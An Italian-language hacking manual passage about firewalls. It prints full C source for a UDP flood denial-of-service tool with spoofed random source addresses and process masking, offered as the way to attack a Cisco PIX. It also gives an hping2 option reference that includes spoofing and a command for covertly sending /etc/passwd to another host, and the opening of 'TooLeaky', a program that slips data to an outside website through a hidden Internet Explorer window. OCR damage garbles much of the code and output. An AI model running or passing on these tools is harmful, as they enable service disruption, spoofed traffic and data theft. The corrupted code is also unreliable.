La creazione di un buon livello di sicurezza è una cosa complessa anche perché spesso le 
funzionalità offerte da questi sistemi sono veramente tante. 

Volendo riportare un ulteriore suddivisione a classi dei firewall potremmo vedere il tutto con i 
seguenti tipi: 



• Firewall per il Packet Inspection 

• Firewall come Filtro 

• Firewall come Gateway 



In molti casi si deve seguire l'evoluzione dei software che gestiscono questi sistemi in quanto, 
come con tutte le altre cose software, potrebbero possedere bugs. 

Mediante la presenza di questi BUGS è possibile portare avanti diverse forme di attacchi 
anche soltanto destinati al loro bloccaggio tramite metodologie da DOS. 
Prendiamo ad esempio il firewall Cisco PIX. 

Questo dispone in molte versioni di software di un problema legato alla gestione di quelle 
definite con il termine di DMZ (Demilitarized Zone) mediante il quale un eventuale hacker 
potrebbe resettare le tabelle di instradanmento. 
Il programma adatto a eseguire questo attacco Dos è il seguente. 

/* [Defines] 7 

#define Port_Max 65534 
#define Packet_Max 1023 
#define Frequency_Max 300 
#define Default_Fork 0 
#define Default_Stealth "(nfsiod)" 
/* Color Pallete 7 
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#define R "\033[1 ;31 m" 
#define G "\033[1 ;32m" 
#define Y "\033[1 ;33m" 
#define U "\033[1 ;34m" 
#define M "\033[1 ;35m" 
#define C "\033[1 ;36m" 
#define W "\033[1 ;37m" 
#define DR "\033[0;31 m" 
#define DG "\033[0;32m" 
#define DY "\033[0;33m" 
#define DU "\033[0;34m" 
#define DM "\033[0;35m" 
#define DC "\033[0;36m" 
#define DW "\033[0;37m" 
#define RESTORE "\33[0;0m" 
#define CLEAR "\033[0;0H\033[J" 

/* [Includes] 7 

#include <unistd.h> 
#include <stdlib.h> 
#include <string.h> 
#include <netdb.h> 
#include <stdio.h> 
#include <sys/types.h> 
#include <sys/socket.h> 
#include <netinet/in.h> 
#include <netinet/in_systm.h> 
#include <netinet/ip.h> 
#include <netinet/tcp.h> 
#include <netinet/protocols.h> 
#include <arpa/inet.h> 
#include <netdb.h> 
#include <signal.h> 
#include <netinet/ip_udp.h> 
#include <string.h> 
#include <pwd.h> 
#include <time.h> 

/* [Option Parsi ng] 7 

struct sockaddrjn dstaddr; 

unsigned long dst; 

struct udphdr *udp; 
struct iphdr *ip; 

char 'target; 
char *srchost; 
char *stealth; 

int dstport = 0; 
int srcport = 0; 
int numpacks = 0; 
int psize = 0; 
int wait = 0; 
int forknum = 0; 

I* [Usage] 7 

void usage(char *pname) 
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{ 

printf("\n\n%sUsage%s %s: %s[%sarguements%s] %s<%sTarget 

lp%s>%s\n\n",DG,R,pname,DM,U,DM,DM,U,DM,RESTORE); 

printf("%sOption Description Default Value\n\n",W,RESTORE); 

printf("%s-%ss %s<%sSource IP %s> %s: %sPacket Origin %s[%s Random 

%s ] \n",DR,DU,W,DC,W,DW,B,W,DC,W,RESTORE); 

printf("%s-%sn %s<%sPacket Num %s> %s: %sLimit of Sent Datagrams %s[%s 
Unlimited %s ] \n",DR,DU,W,DC,W,DW,B,W,DC,W,RESTORE); 

printf("%s-%sp %s<%sPacket Size%s> %s: %sDatagram Size %s[%s 1 - %d 

bytes%s ] \n",DR,DU,W,DC,W,DW,B,W,DC,Packet_Max,W,RESTORE); 

printf("%s-%sd %s<%sTarget Port%s> %s: %sDestination Port %s[%s Random 
%s ] \n",DR,DU,W,DC,W,DW,B,W,DC,W,RESTORE); 

printf("%s-%so %s<%sSource Port%s> %s: %sSource Port %s[%s Random 

%s ] \n",DR,DU,W,DC,W,DW,B,W,DC,W,RESTORE); 

printf("%s-%sw %s<%sFrequency %s> %s: %sDelay Between Each Packet %s[%s 0 - 
%d ms%s ] \n",DR,DU,W,DC,W,DW,B,W,DC,Frequency_Max,W,RESTORE); 

printf("%s-%sf %s<%sFork Number%s> %s: %sNo. of Times Backgrounded %s[%s 0 
Times %s ]%s \n",DR,DU,W,DC,W,DW,B,W,DC,W,RESTORE); 

printf("%s-%sx %s<%sStealth %s> %s: %sMask Process As %s[%s %s 

%s]%s",DR,DU,W,DC,W,DW,B,W,DC,Default_Stealth,W,RESTORE); 

printf("\n\n"); 

exit(EXIT_SUCCESS); 

} 

/* [In chksum with some mods] 7 

unsigned short in_cksum(addr, len) 
u_short *addr; 
int len; 
{ 

register int nleft = len; 
register u_short *w = addr; 
register int sum = 0; 
u_short answer = 0; 

while (nleft > 1) { 
sum += *w++; 
sum += *w++; 
nleft -= 2; 

} 

if (nleft == 1){ 

*(u_char *) (&answer) = *(u_char *) w; 
sum += answer; 

} 

sum = (sum » 17) + (sum & Oxffff); 
sum += (sum » 17); 
answer = -sum; 
return (answer); 

} 

/* Resolve Functions 7 

unsigned long resolve(char *cp) 
{ 

struct hostent *hp; 

hp = gethostbyname(cp); 
if(!hp){ 

printf("[*] Unable to resolve %s\t\n", cp); 
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exit(EXITFAILURE); 

} 

return ((unsigned long) hp->h_addr); 

} 

void resolvedest(void) 
{ 

struct hostent *host; 

memset(&dstaddr, 0, sizeof(struct sockaddrjn)); 
dstaddr.sinfamily = AFJNET; 
dstaddr.sin_addr.s_addr = inet_addr(target); 
if (dstaddr.sin_addr.s_addr == -1) { 

host = gethostbyname(target); 

if (host == NULL) { 

printf ("[*] Unable To resolve %s\t\n", target); 

exit(EXITFAILURE); 

} 

dstaddr.sinjamily = host->h_addrtype; 

memcpy((caddr_t) & dstaddr.sin_addr, host->h_addr, host->h_length); 

} 

memcpy(&dst, (char *) &dstaddr.sin_addr.s_addr, 4); 

} 

/* Parsing Argz 7 

void parse_args(int argo, char *argv[]) 
{ 

int opt; 

while ((opt = getopt(argc, argv, "x:s:d:n:p:w:o:f:")) != -1) 
switch (opt) { 
case 's': 

srchost = (char *) malloc(strlen(optarg) + 1 ); 
strcpy(srchost, optarg); 
break; 
case 'x': 

stealth = (char *) malloc(strlen(optarg)); 
strcpy(stealth, optarg); 
break; 
case 'd': 

dstport = atoi(optarg); 

break; 
case 'n': 

numpacks = atoi(optarg); 

break; 
case 'p': 

psize = atoi(optarg); 

break; 
case 'w': 

wait = atoi (optarg); 

break; 
case 'o': 

srcport = atoi(optarg); 

break; 
case 'f: 

forknum = atoi(optarg); 
break; 
default: 

usage(argv[0]); 
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} 

if (Istealth) 

stealth = Default_Stealth; 
if (Iforknum) 

forknum = Default_Fork; 
if (!argv[optind]) { 

printf("\n\n%s[%s*%s]%s Bzzzt .. We need a Place for the Packets to 
Go%s\n",DC,W,DC,DR,RESTORE); 
exit(EXITFAILURE); 

} 

target = (char *) malloc(strlen(argv[optind])); 
if (Itarget) { 

printf("\n\n%s[%s*%s]%s Unable to Allocate Required Amount of Memory for 
Task%s\n",DC,W,DC,DR,RESTORE); 
perrorfmalloc"); 

exit(EXITFAILURE); 

} 

strcpy(target, argv[optind]); 

} 

int cloaking(int argc, char *argv[]) 
{ 

int x; 

for (x = argc-1 ; x >= 0; x~) 

memset(argv[x], 0, strlen(argv[x])); 
strcpy(arg v[0] .stealth ) ; 

return(O); 

} 

/* [Send Packet] 7 

void main(int argc, char *argv[]) 
{ 

int q, xx, sen, i, unlim = 0, sec_check; 
char *packet; 

banner(); 

if (argc < 2) 

usage(argv[0]); 



parse_args(argc, argv); 
cloaking(argc, argv); 
resolvedest(); 

printf("\n\n%s [%s*%s]%s Target Host%s 
%s%s\n",DC,W,DC,DR,DC,DW,target,RESTORE); 
if (Isrchost) 

printf("%s [%s*%s]%s Source Host%s 
Random%s\n",DC,W,DC,DR,DC,DW,RESTORE); 
else 

printf("%s [%s*%s]%s Source Host%s 
%s\n",DC,W,DC,DR,DC,DW,srchost,RESTORE); 



:%s 
:%s 
:%s %s 
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printf("%s [%s*%s]%s Number%s :%s 
lnfinite%s\n",DC,W,DC,DR,DC,DW,RESTORE); 
else 

printf("%s [%s*%s]%s Number%s :%s 
%d%s\n",DC,W,DC,DR,DC,DW,numpacks,RESTORE); 
if (Ipsize) 

printf("%s [%s*%s]%s Packet Size%s :%s 1 - %d 

bytes%s\n",DC,W,DC,DR,DC,DW,Packet_Max,RESTORE); 
else 

printf("%s [%s*%s]%s Packet Size%s :%s 
%d%s\n",DC,W,DC,DR,DC,DW,psize,RESTORE); 
if (!wait) 

printf("%s [%s*%s]%s Wait Time%s :%s 0 - 

%dms%s\n",DC,W,DC,DR,DC,DW,Frequency_Max,RESTORE); 
else 

printf("%s [%s*%s]%s Wait Time%s :%s 
%d%s\n",DC,W,DC,DR,DC,DW,wait,RESTORE); 
if (Idstport) 

printf("%s [%s*%s]%s Destination Port%s :%s 

Random%s\n",DC,W,DC,DR,DC,DW,RESTORE); 
else 

printf("%s [%s*%s]%s Destination Port%s :%s 

%d%s\n",DC,W,DC,DR,DC,DW,dstport,RESTORE); 
if (Isrcport) 

printf("%s [%s*%s]%s Source Port%s :%s 
Random%s\n",DC,W,DC,DR,DC,DW,RESTORE); 
else 

printf("%s [%s*%s]%s Source Port%s :%s 
%d%s\n",DC,W,DC,DR,DC,DW,srcport,RESTORE); 

printf("%s [%s*%s]%s Backgrounded%s :%s 

%d%s\n",DC,W,DC,DR,DC,DW,forknum,RESTORE); 

if (Istealth) 

printf("%s [%s*%s]%s Masked As%s :%s 
%s%s\n",DC,W,DC,DR,DC,DW,Default_Stealth,RESTORE); 
else 

printf("%s [%s*%s]%s Masked As%s :%s 
%s%s\n",DC,W,DC,DR,DC,DW,stealth,RESTORE); 



if (forknum) { 
switch(fork()) { 
case -1 : 

printf("%s [%s*%s]%s Your OS cant Make the fork() cali as we need 
it",DC,W,DC,DR,RESTORE); 

printf("%s [%s*%s]%s This is usually an indication of something 

bad%s",DC,W,DC,DR,RESTORE); 
exit(1); 
case 0: 
break; 
default: 
forknum--; 

for(xx=0;xx<forknum;xx++){ 
switch(fork()){ 
case -1 : 

printf("%s [%s*%s]%s Unable to fork%s\n",DC,W,DC,DR,RESTORE); 
printf("%s [%s*%s]%s This is usually an indication of something 
bad%s",DC,W,DC,DR,RESTORE); 
exit(1); 
case 0: 
xx=forknum; 
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break; 
default: 

if(xx==forknum-1){ 

printf("%s [%s*%s]%s Process Backgrounded%s\n",DC,W,DC,DR,RESTORE); 
exit(O); 

} 

break; 

} 

} 

} 

} 

sen = socket(AF_INET, SOCK_RAW, IPPROTO_RAW); 
packet = (char *) malloc(sizeof(struct iphdr) + sizeof(struct udphdr) + psize); 
ip = (struct iphdr *) packet; 

udp = (struct udphdr *) (packet + sizeof (struct iphdr)); 
memset(packet, 0, sizeof(struct iphdr) + sizeof(struct udphdr) + psize); 

if (Inumpacks) { 
unlim++; 
numpacks++; 

} 

if (srchost && *srchost) 

ip->saddr = resolve(srchost); 
ip->daddr = dst; 
ip->version = 4; 
ip->ihl = 5; 
ip->ttl = 255; 

ip->protocol = IPPROTO_UDP; 

ip->tot_len = htons(sizeof(struct iphdr) + sizeof(struct udphdr) + psize); 
ip->check = in_cksum(ip, sizeof(struct iphdr)); 

udp->source = htons(srcport); 

udp->dest = htons(dstport); 

udp->len = htons(sizeof (struct udphdr) + psize); 

/* 

* Because we like to be Originai Seeding rand() with something as 

* unique as time seemed groovy. Lets have a loud Boo for Pattern 

* Loggers. 

7 

srand(time(0)); 

for (i = 0; i < numpacks; (unlim) ? i++, i- : i++) { 
if (Isrchost) 
ip->saddr = rand(); 
if (Idstport) 

udp->dest = htons(rand()%Port_Max+1); 
if (Isrcport) 

udp->source = htons(rand()%Port_Max+1); 
if (Ipsize) 

udp->len = htons(sizeof(struct udphdr) + rand()%Packet_Max); 

if (sendto(sen, packet, sizeof(struct iphdr) + 

sizeof(struct udphdr) + psize, 

0, (struct sockaddr *) Sdstaddr, 

sizeof(struct sockaddrjn)) == (-1)) { 
printf("%s[%s*%s]%s Error sending Packet%s",DC,W,DC,DR,RESTORE); 
perror("SendPacket"); 
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exit(EXITFAILURE); 

} 

if (!wait) 

usleep(rand()%Frequency_Max); 
else 

usleep(wait); 

} 



Come abbiamo detto prima spesso l'identificazione di un firewall è complessa. 

Lo strumento fornito da NMAP, visto in altri capitoli legati allo scanning, può essere utilizzato 

anche per cercare di individuare i sistemi protetti. 

Quando NMAP esegue lo scan di un host, questo non richiede soltanto quali porte sono 
aperte e quali sono chiuse, ma vi dice anche quali porte sono bloccate.. 
La quantità di informazioni ricevute da uno scan di una porta potrebbe dirci qualche cosa 
legato al tipo di configurazione del firewall. 

Una porta filtrata con NMAP potrebbe indicare una delle seguenti cose: 

1 . Nessun pacchetto SYN/ACK è stato ricevuto 

2. Nessun pacchetto RST/ACK è stato ricevuto 

3. Un messaggio ICMP di tipo 3 (Destination Unreachable) con codice 13 

NMAP esegue il pool su queste tre condizioni per individuare una porta protetta. 
Un altro programma che può essere utilizzato per reperire informazioni legate ai sistemi 
protetti da firewall è HPING, scritto da Salvatore Sanfilippo, il quale invia verso il sistema di 
destinazione dei pacchetti e riporta quelli restituiti. 

HPING2 restituisce una varietà di risposte in funzione di moltissime condizioni. 
Utilizzando HPING2 è possibile individuare porte bloccate, porte dropped e pacchetti rifiutati. 
Hping è anche utile per l'individuazione di alcuni tipi di informazioni come ad esempio quelli 
necessari in quei cas in cui si cerca di individuare i numeri di sequenza all'interno dei 
pacchetti TCP. 

La sintassi di HPING2 è la seguente : 

hping2 [ -hvnqVDzZ012WrfxykQbFSRPAUXYjJBuTG ] [ -c count] [ -i wait] [ -fast ] [ -I 
interface ] [ -9 signature ] [ -a host] [ -t ttl] [ -N ip id ] [ -H ip protocol ] [ -g fragoff] [ -m mtu ] [ 
-o tos ] [ -C icmp type ] [ -K icmp code ] [ -s source port ] [ -p[+][+] dest port ] [ -w tcp window 
] [ -O tcp offset ] [ -M tcp sequence number ] [ -L tcp ack ] [ -d data size ] [ -E filename ] [ -e 
signature ] [ -icmp-ipver version ] [ --icmp-iphlen length ] [ -icmp-iplen length ] [ -icmp- 
ipid id] [ -icmp-ipproto protocol] [ -icmp-cksum checksum ] [ --icmp-ts ] [ --icmp-addr ] [ 
-tcpexitcode ] [ --tcp-timestamp ] [ --tr-stop ] [ -tr-keep-ttl ] [ --tr-no-rtt ] hostname 

Un esempio di sessione HPING2 è la seguente : 



hping 192.1 68.0.5 -r -W 

ethO default routing interface selected (according to /proc) 
HPING 1 92.168.0.5 (ethO 192.168.0.5): NO FLAGS are set, 
40 headers + 0 data bytes 



46 bytes 


from 


192 


168 


0 


5: 


flags= 


=RA 


seq= 


=0 ttl= 


128 


id= 


=4170 win=0 rtt=0.3 ms 


46 bytes 


from 


192 


168 


0 


5: 


flags= 


=RA 


seq= 


=1 ttl= 


128 


id= 


=+1 win=0 rtt=0.2 ms 


46 bytes 


from 


192 


168 


0 


5: 


flags= 


RA 


seq= 


=2 ttl= 


128 


id= 


=+1 win=0 rtt=0.2 ms 


46 bytes 


from 


192 


168 


0 


5: 


flags= 


=RA 


seq= 


=3 ttl= 


128 


id= 


=+1 win=0 rtt=0.3 ms 


46 bytes 


from 


192 


168 


0 


5: 


flags= 


=RA 


seq= 


=4 ttl= 


128 


id= 


=+2 win=0 rtt=0.2 ms 


46 bytes 


from 


192 


168 


0 


5: 


flags= 


=RA 


seq= 


=5 ttl= 


128 


id= 


=+2 win=0 rtt=0.2 ms 


46 bytes 


from 


192 


168 


0 


5: 


flags= 


=RA 


seq= 


=6 ttl= 


128 


id= 


=+2 win=0 rtt=0.2 ms 


46 bytes 


from 


192 


168 


0 


5: 


flags= 


=RA 


seq= 


=7 ttl= 


128 


id= 


=+2 win=0 rtt=0.2 ms 


46 bytes 


from 


192 


168 


0 


5: 


flags= 


=RA 


seq= 


=8 ttl= 


128 


id= 


=+2 win=0 rtt=0.2 ms 


46 bytes 


from 


192 


168 


0 


5: 


flags= 


RA 


seq= 


=9 ttl= 


128 


id= 


-■+2 win=0 rtt=0.2 ms 


46 bytes 


from 


192 


168 


0 


5: 


flags= 


=RA 


seq= 


=10 tt 


=128 id=+2 win=0 rtt=0.3 ms 
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46 bytes from 1 92.1 68.0.5: flags=RA seq=1 1 ttl=1 28 id=+1 win=0 rtt=0.2 ms 
46 bytes from 1 92.1 68.0.5: flags=RA seq=1 2 ttl=1 28 id=+1 win=0 rtt=0.2 ms 
46 bytes from 1 92.1 68.0.5: flags=RA seq=1 3 ttl=1 28 id=+1 win=0 rtt=0.2 ms 
46 bytes from 1 92.1 68.0.5: flags=RA seq=1 4 ttl=1 28 id=+1 win=0 rtt=0.2 ms 



Opzioni di base 

-h - aiuto 
-v - versione 
-c - conteggio 

Si ferma dopo avere inviato (o ricevuto) N pacchetti di risposta di conteggio. Dopo 
che l'ultimo pacchetto è stato inviato hping2 attende COUNTREACHEDTIMEOUT 
secondi. Potete editare il valore di COUNTREACHED TIMEOUT dentro ahping2.h 
-/' -- intervallo 

Attende il numero specificato di secondi o di micro secondi tra ogni pacchetto. 

-- interval X ha mette I' attesa a secondi 

-- interval uX mette l'attesa a X microsecondi 

Il default è di un secondo tra ogni pacchetto. 

-fast 

Alias di -i U10000. Hping invierà 10 pacchetti per secondo. 
-n - numerico 

Output numerico soltanto. 
-q - silenzio 

Prodotto silenzioso. Niente è mostrato tranne le linee riepilogative a tempo di avvio e 

quando finito. 
-/ -- nome di interfaccia dell'interfaccia 

Per default su sistemi linux e BSD hping2 utilizza interfaccia di instradamento di 

default. In altri sistemi o quando non c'è alcun default hping2 utilizza la prima 

interfaccia non di loopback. 
-V- verbose 

Output verbose. Le risposte TCP saranno mostrate come segue: 
len=46 ip=1 92.1 68.1.1 flags=RA DF seq=0 ttl=255 id=0 win=0 rtt=0.4 m tos=0 
iplen=40 seq=0 ack=1 380893504 sum=2010 urp=0 
-D - debug 

Permettete il modo di debug, è utile quando avete dei problemi con hping2. 
-z -- legatura 

Collega CTRL+Z a time to live (TTL) così avrete la capacità di di incrementare/ 
diminuire il ttl dei pacchetti in partenza premendo CTRL+Z una volta o due. 
-Z-- scollega 

Scollega CTRL+Z 

Selezione di protocollo 

Il protocollo di default è TCP, per default hping2 invia le testate tcp alla la porta 0 dell' ospite 
con un winsize di 64 senza nessun flag tcp. Spesso questo è il modo migliore per fare un 
'hide ping,' utile quando l'obiettivo è dietro un firewall che perde gli ICMP. 

-0 - rawip 

Il modo RAW IP, in questo modo hping2 invierà la testata IP con i dati aggiunti con -- 
signature e/o --file, vede anche -ipproto che vi permette di mettere il campo ip del 
protocollo. 
-1 -icmp 

Il modo ICMP, di default hping2 invierà una richiesta di eco ICMP, potete mettere altri 
tipo/codice ICMP utilizzando le opzioni -icmptype -icmpcode. 

-2 -udp 

Il modo UDP, di default hping2 invierà udp per puntare alla porta 0 dell' ospite. Le 
opzioni UDP sono : baseport --, destport --keep 

-9-listen signature 

HPING2 ascolta il modo, utilizzando questa opzione hping2 aspetta il pacchetto che 
contiene la firma e scarica da fine di firma alla fine di pacchetto. Per esempio se 
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hping2 -listen TEST legge un pacchetto che contiene 234-09sdflkjs45- 
TESThello_world e mostrerà hello_world. 

Opzioni riferite a IP 

-a -spoof hostname 

Utilizzate questa opzione allo scopo di mettere un indirizzo sorgente IP falso, questa 
opzione assicura che quell'obiettivo non conseguirà il vostro indirizzo reale. Tuttavia 
le risposte saranno inviate a un indirizzo falso, cosicché non potrete vederli. Allo 
scopo di vedere come è possibile eseguire uno scannino spoofed/idle consultate 
HPING2 HOWTO. 
-t -ttl ti me to live 

Utilizzate questa opzione per settare il tempo TTL dei pacchetti in partenza. 
Probabilmente utilizzerete questo con -traceroute o -bind. Se avete dubbi tentate 
hping2 some.host.com -t 1 -- traceroute.' 

-N -id 

Setta il campo di identificativo ip->id field. L'identificativo di default è casuale ma se la 
frammentazione è attiva e l'identificativo non è specificato sarà getpid & OxFF. 

-H -ipproto 

Mette il protocollo ip in modo RAW IP. 

-W-winid 

L'identificativo Windows* ha vari byte che ordinano, se questa opzione è attiva 
hping2 mostra gli identificativi risposta delle finestre. 

-r --rei 

Mostra gli incrementi di identificativo invece degli identificativi. Vedete l'HPING2 
HOWTO per ulteriori informazioni. Gli incrementi non sono calcolati come [N] -id [Ni- 
li ma utilizzando una compensazione di perdita dei pacchetti. Vedete relid.c per 
ulteriori informazioni. 

-f-frag 

Separa i pacchetti in più frammenti, questo può essere utile allo scopo di provare 
prestazioni di frammentazione delle pile IP e ad eseguire dei test. 
-x -morefrag 

Setta più flags di frammentazione IP, utilizzate questa opzione se volete che l'ospite 
di destinazione invii un ICMP tempo-superato durante il reassembly. 

-y -dontfrag 

Setta il flag di non frammentazione. 
-g -fragoff fragment value 

Mettete l'offset del frammento 
-m -mtu mtu value 

Mette un valore diverso da 16 relativo al 'mtu virtuale' quando la frammentazione è 
abilitata. Se la dimensione dei pacchetti è più grande del 'mtu virtuale' la 
frammentazione è accesa automaticamente. 
-o -tos hex_tos 

Setta il tipo di servizio (TOS,) per ulteriori informazioni -help tos 
-G -rroute 

Record route. Include l'opzione RECORD_ROUTE in ogni pacchetto inviata e mostra 
il route buffer dei pacchetti restituiti. 

Opzioni relativa a Icmp 

-C -icmptype type 

Setta il tipo icmp, il default è richiesta di eco ICMP (implica -icmp) 
-K - icmpcode code 

Setta il codice icmp, il default è 0. (Implica -icmp) 
-icmp-ipver 

Setta la versione IP di testata IP contenuta nei dati ICMP, il default è 4. 
-icmp-iphlen 

Setta la lunghezza di testata IP contenuta nei dati ICMP, il default è 5 (5 words di 32 
bits.) 
-icmp-iplen 

Setta la lunghezza del pacchetto IP contenuta nei dati ICMP, il default è la lunghezza 
reale. 
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-icmp- ipid 

Setta l'identificativo IP dentro ai dati ICMP, il default è casuale. 
-icmp- ipproto 

Setta il protocollo IP di testata IP contenuta nei dati ICMP, il default è TCP. 
-icmp-cksum 

Setta il totale di controllo ICMP, per default è il totale di controllo valido. 
-icmp- ts 

Alias di -icmptype 13 
-icmp-addr 

Alias di --icmptype 17 



Opzioni Tcp/ Udp 

-s -baseport source port 

hping2 utilizza la porta di sorgente allo scopo di indovinare il numero di sequenza 
Inizia con un numero di porta di sorgente di base, e aumenta questo numero per 
ogni pacchetto ha inviato. Quando il pacchetto è ricevuto il numero di sequenza può 
essere calcolato come replies.dest.port- base. source. port. La porta di sorgente di 
base di default è casuale, utilizzando questa opzione voi siete in grado di impostare 
un numero diverso. 

-p --destport [+] [+] 

Setta la porta di destinazione, il default è 0. Se il carattere '+' precede numero di 
porta dest (cioè +1024) la porta di destinazione sarà incrementata per ogni risposta 
ricevuta. Se un doppio '+' precede il numero di porta dest (cioè ++1024,) la porta di 
destinazione sarà potenziato per ogni pacchetto inviato. Per default la porta di 
destinazione può essere modificato interattivamente utilizzando CTRL+z. 

-w -win 

Setta la dimensione della finestra TCP. Il default è 64. 
-O -tcpoff 

Setta I' offset dei dati tcp falso. L'offset di dati normale è tcphdrlen/ 4. 
-M -tcpseq 

Imposta il numero di sequenza TCP. 
-L - tcpack 

Mette il TCP ack. 
-Q - seqnum 

Questa opzione può essere utilizzata allo scopo di raccogliere i numeri di sequenza 

generati dal ospite. Questo può essere utile quando avete bisogno di analizzare se il 

numero di sequenza TCP è prevedibile. Esempio di prodotto: 

#hping2 win98 -- seqnum -p 139 -S -i u1 -I ethO 

HPING uaz (ethO 1 92.1 68.4.41 :) Insieme S, 40 testate +0 byte di dati 

2361294848 +2361294848 

2411626496 +50331648 

2545844224 +1 3421 7728 

2713616384+167772160 

2881388544+167772160 

3049160704+167772160 

3216932864+167772160 

3384705024+167772160 

3552477184+167772160 

3720249344+167772160 

3888021504+167772160 

4055793664+167772160 

4223565824 +167772160 

La prima colonna si riferisce al numero di sequenza, la seconda alla differenza tra il 
corrente e l'ultimo numero di sequenza. Poiché potete vedere la sequenza del 
sistema di destinazione i numeri sono prevedibili. 
-b -badcksum 

Invia pacchetti con un cattivo totale di controllo UDP/ TCP 

-F -fin 

Mette il flag tcp FIN. 
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-S -syn 

Mette il flag tcp SYN. 

-R -rst 

Setta il flag tcp RST. 
-P --push 

Setta il flag tcp PUSH. 

-A -ack 

Setta la bandiera tcp ACK. 

-U -urg 

Setta il flag tcp URG. 
-X-xmas 

Setta il flag Xmas. 
-V-ymas 

Setta il flag Ymas. 

Opzioni comuni 

-d -data data size 

Setta la dimensione del corpo del pacchetto. Attenzione, utilizzando --datai 40 hping2 
non genererà pacchetti di 0 byte ma byte protocol_header+40. hping2 mostrerà le 
informazioni di dimensione di pacchetto come primo prodotto di linea, come questo: 
HPING www.yahoo.com (pppO 204.71.200.67:) NO FLAGS è l'insieme, 40 testate 
+ 40 byte di dati 
-E -file filename 

Utilizzate il contenuto di nome file per immettere i dati dei pacchetti, 
-e-sign signature 

Riempie il primo byte di lunghezza di firma di dati con firma. Se la lunghezza di firma 
è più grande delle dimensione dei dati un messaggio di errore sarà mostrato. 
-j -dump 

Esegue il dump dei pacchetti ricevuti in hex 
-J -print 

Stampa i pacchetti ricevuti 
-B - safe 

Abilita il protocollo sicuro, utilizzando questa opzione i pacchetti persi in trasferimenti 
file saranno reinviati. Per esempio allo scopo di inviare I' archivio /etc/passwd dal 
sistema A a quello B potete utilizzare il seguente comando: 
[host_a]# hping2 host_b -udp -p 53 -d 100 -sign signature -safe -file /etc/passwd 
[host_b]# hping2 host_a — listen signature -safe -icmp 

-u -end 

Se state utilizzando -file filename, vi dice quando è stato raggiunto EOF. 
-T- traceroute 

Modo Traceroute. Utilizzando questa opzione hping2 aumenterà ttl per ogni ICMP 
time to live 0 during transit ricevuto. 

-trttl 

Mantiene il TTL fisso in modo traceroute. 
- tr stop 

Se questa opzione è specificata hping uscirà una volta che il primo pacchetto che 
non è un tempo ICMP superato è ricevuto. Questo emula meglio il comportamento di 
traceroute. 
-tr no rtt 

Non mostra le informazioni RTT in modo traceroute. Il tempo ICMP in cui le 
informazioni RTT superate non sono nemmeno calcolate se questa opzione è 
settata. 

Un LEAK CHECKER per i firewall è quello che segue : 

/* 



TooLeaky: Trivial Firewall Leak Checker (http://tooleaky.zensoft.com/) 
Bob Sundling (tooleaky@zensoft.com) 
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clalms to offer "outbound" protectlon, because it does not send or recelve 
data itself. Instead, it uses a hidden Internet Explorer window to do it . 
And, of course, everybody allows Internet Explorer to send and receive data, 
otherwise using the Internet would be a big pain in the you-know—what . 
This program does two things : 

(1) Transmits the string "PersonalInfoGoesHere" to Steve Gibson's web site. 

(2) Retrieves a string back from Steve Gibson's web site, stored in the 
<TITLEx/TITLE> section of a web page. 

For a programmer to use this method generically in their application, they 
would simply need to replace the URL in this program with a URL from their 
own site, change the outputString from "PersonalInfoGoesHere" to any 
Information they would like to transmit, and then set up their web server to 
return the Information they would like to retreive in the <TITLEx/TITLE> 
block of their page (the first few characters of the title are used as a 
unique identifier so this program can find the window, since it doesn 't 
bother to keep track of the hidden IE window when it 's first created) . And of 
course a programmer could repeat this process to transmit or receive as much 
data as they'd like, or use the methods outlined in the code to send or 
receive LARGE blocks of data in one fell swoop. 

So why did I write this? Because I was starting to get sick of the whole 
firewall debate, especially the ongoing feud between Steve Gibson and Network 
Ice. Initially Steve said that Network Ice's "Black Ice De fender" product was 
no good, and demonstrated that statement by showing that his LeakTest program 
could send and receive data through their "firewall " but not through anyone 
else's (at least, after they patched their firewalls up a bit). Based on 
that, he made the claim that other firewalls like "Zone Alarm" are better. 
Network Ice responded by saying that outbound filtering is not important , but 
eventually (actually, very recently) they put in a ridiculous block 
speci fically to prevent Black Ice Defender from allowing Steve 's LeakTest 
program to work. Steve then countered by correcting his LeakTest program by 
making it retrieve data from a different site (his main server) , on a 
different port (80) . 

Indeed, once again with this new version, "LeakTest " does get through Black 
Ice De fender , but not through other "firewalls " like Zone Alarm, McAfee 
Firewall, Sygate Personal Firewall, Norton Firewall, or Tiny Personal 
Firewall . 

But I believe that real problem here is that Steve is (perhaps quite 
unintentionally) simply writing to get around Black Ice Defender 
speci fically . "LeakTest" does not think "outside the box, " and that ' s why ali 
those firewalls can "block" Steve's program. If you want to get around a 
firewall, and you know that the firewalls check which programs are sending 
data, then you shouldn't do it the way Steve has been! :-) 

Now, it is true that Steve has been rather busy, and he has been talking 
about things like adding "DLL hooking" to LeakTest lately, so I will cut him 
some slack here. :-) 

So, in an attempt to better educate users about how useless ALL of these 
firewall programs really are, I did Steve's LeakTest one better. Like 
everyone else, I've seen the LeakTest pages that claim that ali these other 
firewalls are better than Black Ice Defender . But, in fact ali of those 
firewalls share one very large problem: their design is inherently flawed by 
the operating system they are running on. Basically : If a firewall is going 
to allow some program (such as Internet Explorer) to transmit and receive 
data over the Internet, and that program allows other programs to control its 
actions, then there's no point in blocking anything at ali. 

Now, of course, this example program is intentionally simple. It could do far 
more, such as transmit longer strings, retrieve complete files, etc. I kept 
it short and to the point to demonstrate one thing: It doesn 't take much to 
get around today's so-called "firewalls." 

(I was also getting sick of ali of Steve Gibson's *GIGANTIC* programs, often 
16KB or more, written in massively expansive assembly language. So I wrote 
this in C++. The executable file is under 4KB.) ;—) (Sorry Steve, I couldn't 
resist . ) :-) 

Enjoy! 



Bob Sundling 

tooleaky@zensoft . com 

http: //toleaky. zensoft . com/ 
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PS. An important note for those of you compiling this into an executable 
program: Do it without your compiler ' s de fault libraries, otherwise your 
linker will choke! 



*/ 



// Include one header, and then only bits and pieces of it (that 's more than enough) 
idefine WIN32_LEAN_AND_MEAN 
iinclude <windows.h> 

// Forward declarations 

BOOL CALLBACK EnumWindowsProc ( HHND hWnd, LPARAM lParam ); 
bool DisplayWelcomeBanner ( ) ; 
bool TransmitAndReceiveData ( ) ; 
void DisplaySucessBanner ( ) ; 
void DisplayFailureBanner ( ) ; 

// Some basic library functions so we can avoid the standard C++ library 
bool zmemcmp ( void* _bl, void* __b2, size t len ); 
char* z_strcat ( char* dest, const char *src ); 
char* z_strcpy ( char* dest, const char *src ) ; 
size_t z_strlen ( const char *s ) ; 

// A few global variables for fun 
HWND ieWnd; 

const char* title = "TooLeaky: Trivial Firewall Leak Checker 

(http : / /tooleaky . zensoft . com/) " ; 

